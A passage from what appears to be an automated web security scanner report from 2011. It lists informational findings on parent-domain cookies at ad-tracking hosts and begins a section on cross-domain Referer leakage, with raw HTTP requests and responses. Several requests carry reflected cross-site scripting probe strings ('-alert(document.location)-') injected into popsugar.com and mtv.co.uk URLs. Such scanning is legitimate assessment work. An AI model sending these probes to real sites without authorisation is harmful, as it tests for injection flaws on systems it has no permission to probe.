Date: Mon, 12 Sep 2011 13:07:51 GMT
Server: QS

qcCallback({"segments":[{"id":"D"}]});
10.39. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=403227748;fpan=1;fpa=P0-1895254174-1315850535699;ns=0;url=http%3A%2F%2Fwww.popsugar.com%2Fajaxharness1274b%2522-alert(document.location)-%2522faa5baba69b%3Fharness_requests%3D%257B%2522replacements%2522%253A%2520%255B%257B%2522sugar-menu-subnav-items%2522%253A%2520%2522%252Fsugar-subnav-items%253Ffastcache%253D1%2526fg_locale%253D0%2522%257D%252C%2520%257B%2522user-feedback-div%2522%253A%2520%2522%252Fsugar-user-feedback-form%253Fissue%253Dinfinite%252520scroll%2522%257D%255D%252C%2520%2522callbacks%2522%253A%2520%255B%255D%257D;ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=site_name.PopSugar;dst=1;et=1315850535698;tzo=300;a=p-36POJYHTosuxU HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/ajaxharness1274b%22-alert(document.location)-%22faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EAkBHwHXB4GxBprRW9iBACyEAQA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EMMBGAHYB7vR0b2IENhCEA; expires=Sun, 11-Dec-2011 13:01:57 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Mon, 12 Sep 2011 13:01:57 GMT
Server: QS

10.40. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tap.php?v=6432&rnd1315831249 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.dome9.com%2F&jsref=&rnd=1315849265708
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3152310.js^1^1315405364^1315405364&3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266432%3D1%266286%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C56%2C4%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C%266286%3D14843%2C0%2C1%2C%2C; put_2132=439524AE8C6B634E021F5F7802166020

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:40:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266286%3D1%266432%3D1; expires=Wed, 12-Oct-2011 12:40:56 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C120%2C6%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C%266286%3D14843%2C0%2C1%2C%2C; expires=Wed, 12-Oct-2011 12:40:56 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;
10.41. http://rs.gwallet.com/r1/pixel/x420r5075003  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x420r5075003

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x420r5075003 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=; ra1_uid=4711648038188259648; ra1_oo=1

Response

HTTP/1.1 200 OK
Content-Length: 134
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Tue, 11-Sep-2012 12:49:30 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=o5; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Mon, 12-Sep-2016 12:49:30 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1" width="1" height="1" border="0" ></body></html>
10.42. http://usadmm.dotomi.com/dmm/servlet/dmm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usadmm.dotomi.com
Path:   /dmm/servlet/dmm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dmm/servlet/dmm?rurl=http%3A//ads.dotomi.com/ads.php%3Fpid%3D18300%26mtg%3D0%26ms%3D18%26btg%3D1%26mp%3D1%26dres%3Diframe%26rwidth%3D728%26rheight%3D90%26pp%3D0%26cg%3D42%26tz%3D300&pid=18300&dres=iframe&mtg=0&ms=18&btg=1&mp=1&rwidth=728&rheight=90&pp=0&cg=42&tz=300&cturl=http://yads.zedo.com/ads2/c%3Fa=669089%3Bn=826%3Bx=3597%3Bc=826000622%2C826000622%3Bg=172%3Bi=0%3B1=8%3B2=1%3Btg=1552553424%3Bs=403%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=1545%3Bsc=8%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D688047%3Bh%3D484782%3Bo%3D20%3By%3D305%3Bv%3D1%3Bt%3Dr%3Bl%3D1%3Bk=http://www.dotomi.com/ HTTP/1.1
Host: usadmm.dotomi.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; DotomiStatus=5

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 12 Sep 2011 12:48:27 GMT
X-Name: dmm-s02
Set-Cookie: DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; Domain=.dotomi.com; Expires=Wed, 11-Sep-2013 12:48:27 GMT; Path=/
Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Sat, 10-Sep-2016 12:48:27 GMT; Path=/
Location: http://ads.dotomi.com/ads.php?pid=18300&mtg=0&ms=18&btg=1&mp=1&dres=iframe&rwidth=728&rheight=90&pp=0&cg=42&tz=300
Content-Length: 0
Content-Type: text/plain

10.43. http://viamtvuk.112.2o7.net/b/ss/viamtvuk/1/H.22.1/s71862144072074  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtvuk.112.2o7.net
Path:   /b/ss/viamtvuk/1/H.22.1/s71862144072074

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtvuk/1/H.22.1/s71862144072074?AQB=1&ndh=1&t=12%2F8%2F2011%2012%3A49%3A5%201%20300&pageName=%2F&g=http%3A%2F%2Fwww.mtv.co.uk%2F&r=http%3A%2F%2Fdrupal.org%2Fcases&ch=homepage&events=event16&c1=%2F&h1=index&c3=homepage&c4=not%20logged-in&c5=non-member&c16=homepage&c33=Monday&c34=5%3A30PM&c41=New&v45=Monday&v46=5%3A30PM&v49=homepage&s=1920x1200&c=16&j=1.6&v=Y&k=N&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtvuk.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]; s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:50:03 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFFD85149B5F-6000018C40017E3C|4E6DFFB0[CE]; Expires=Sat, 10 Sep 2016 12:50:03 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 12:50:03 GMT
Last-Modified: Tue, 13 Sep 2011 12:50:03 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6DFFFB-36A5-3043A8C4"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www498
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
10.44. http://viamtvuk.112.2o7.net/b/ss/viamtvuk/1/H.22.1/s88215071307387  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtvuk.112.2o7.net
Path:   /b/ss/viamtvuk/1/H.22.1/s88215071307387

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtvuk/1/H.22.1/s88215071307387?AQB=1&ndh=1&t=12%2F8%2F2011%2013%3A5%3A19%201%20300&pageName=files4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&g=http%3A%2F%2Fwww.mtv.co.uk%2Ffiles4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&r=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&ch=generic&events=event16&h1=files4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&c3=generic&c4=not%20logged-in&c5=non-member&c16=generic&c33=Monday&c34=7%3A00PM&c41=New&v45=Monday&v46=7%3A00PM&v49=generic&s=1920x1200&c=16&j=1.7&v=Y&k=N&bw=1106&bh=816&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava(TM)%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&AQE=1 HTTP/1.1
Host: viamtvuk.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; s_vi_iex608x3Bgbx7Dnaxx=[CS]v4|27365326051636CC-400001A380004C94|4E6D4EF3[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:05:02 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFD8051613AB-600001A280003EFD|4E6DFFB0[CE]; Expires=Sat, 10 Sep 2016 13:05:02 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:05:02 GMT
Last-Modified: Tue, 13 Sep 2011 13:05:02 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E037E-2269-131ACF42"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www434
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
11. Cross-domain Referer leakage  previous  next
There are 59 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

11.1. http://ad.doubleclick.net/adi/cdg.NowPublic.Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/cdg.NowPublic.Home

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/cdg.NowPublic.Home;kw=;ptype=home;pos=3;tile=3;sz=300x250;ord=4942? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html; charset=UTF-8
Content-Length: 4212
Date: Mon, 12 Sep 2011 12:48:16 GMT

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="300" HEIGHT="250"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CKCkr7K8uOKiUhCsAhj6ATIIBpd1jLcWmfQ">
...[SNIP]...
2Q9lJLZYKC5iQA%26client%3Dca-pub-7479725245717969%26adurl%3Dhttp://www.baycitizen.org/%253Futm_source%253Dgoogle.com%2526utm_medium%253Dcpc%2526utm_campaign%253Ddisplayad%2526utm_content%253Ddisplay1"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CKCkr7K8uOKiUhCsAhj6ATIIBpd1jLcWmfQ" id="google_flash_embed" WIDTH="300" HEIGHT="250" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DB4IkdkP9tTtO5I46xsQfWuLHpAvWc9MsC5ZDF8yrAjbcB0J_LARABGAEgrYHOAzgAUKTyxKf7_____wFgyZ7-hsij_BqyARF3d3cubm93cHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQTaARlodHRwOi8vd3d3Lm5vd3B1YmxpYy5jb20vgAIBuAIYqAMB6AOZAegDE-gDpgX1AwAAAET1AzIgAAGgBgQ%26num%3D1%26sig%3DAOD64_2PWrtpk8dvhqB32Q9lJLZYKC5iQA%26client%3Dca-pub-7479725245717969%26adurl%3Dhttp://www.baycitizen.org/%253Futm_source%253Dgoogle.com%2526utm_medium%253Dcpc%2526utm_campaign%253Ddisplayad%2526utm_content%253Ddisplay1" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.nowpublic.com/%26hl%3Den%26client%3Dca-pub-7479725245717969%26adU%3Dwww.baycitizen.org%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEqSwZzT3D4ViR4QUdYXnLcqUe3zw" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110719/abg.js"></script>
...[SNIP]...
11.2. http://ad.doubleclick.net/adi/cdg.NowPublic.Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/cdg.NowPublic.Home

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/cdg.NowPublic.Home;kw=;ptype=home;dcopt=ist;tile=1;sz=728x90;ord=6895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html; charset=UTF-8
Content-Length: 4207
Date: Mon, 12 Sep 2011 12:48:15 GMT

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CP-ki_jf0ra76wEQ2AUYWjIIHtgmlK9nuec">
...[SNIP]...
9BzHzWgdi6CBkQ%26client%3Dca-pub-7479725245717969%26adurl%3Dhttp://www.baycitizen.org/%253Futm_source%253Dgoogle.com%2526utm_medium%253Dcpc%2526utm_campaign%253Ddisplayad%2526utm_content%253Ddisplay2"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CP-ki_jf0ra76wEQ2AUYWjIIHtgmlK9nuec" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBWMLCj_9tTv7qA9mn6AbKnaX9BvWc9MsC_f7E8yrAjbcBsMaKARABGAEgrYHOAzgAUIHuprn7_____wFgyZ7-hsij_BqyARF3d3cubm93cHVibGljLmNvbboBCTcyOHg5MF9hc8gBBNoBGWh0dHA6Ly93d3cubm93cHVibGljLmNvbS-AAgG4AhioAwHoA5kB6AMT6AOmBfUDAAAARPUDMiAAAaAGBA%26num%3D1%26sig%3DAOD64_2J07mCVNhZnUbG9BzHzWgdi6CBkQ%26client%3Dca-pub-7479725245717969%26adurl%3Dhttp://www.baycitizen.org/%253Futm_source%253Dgoogle.com%2526utm_medium%253Dcpc%2526utm_campaign%253Ddisplayad%2526utm_content%253Ddisplay2" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.nowpublic.com/%26hl%3Den%26client%3Dca-pub-7479725245717969%26adU%3Dwww.baycitizen.org%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEqSwZzT3D4ViR4QUdYXnLcqUe3zw" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110831/r20110719/abg.js"></script>
...[SNIP]...
11.3. http://ad.doubleclick.net/adi/cdg.NowPublic.Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/cdg.NowPublic.Home

Issue detail

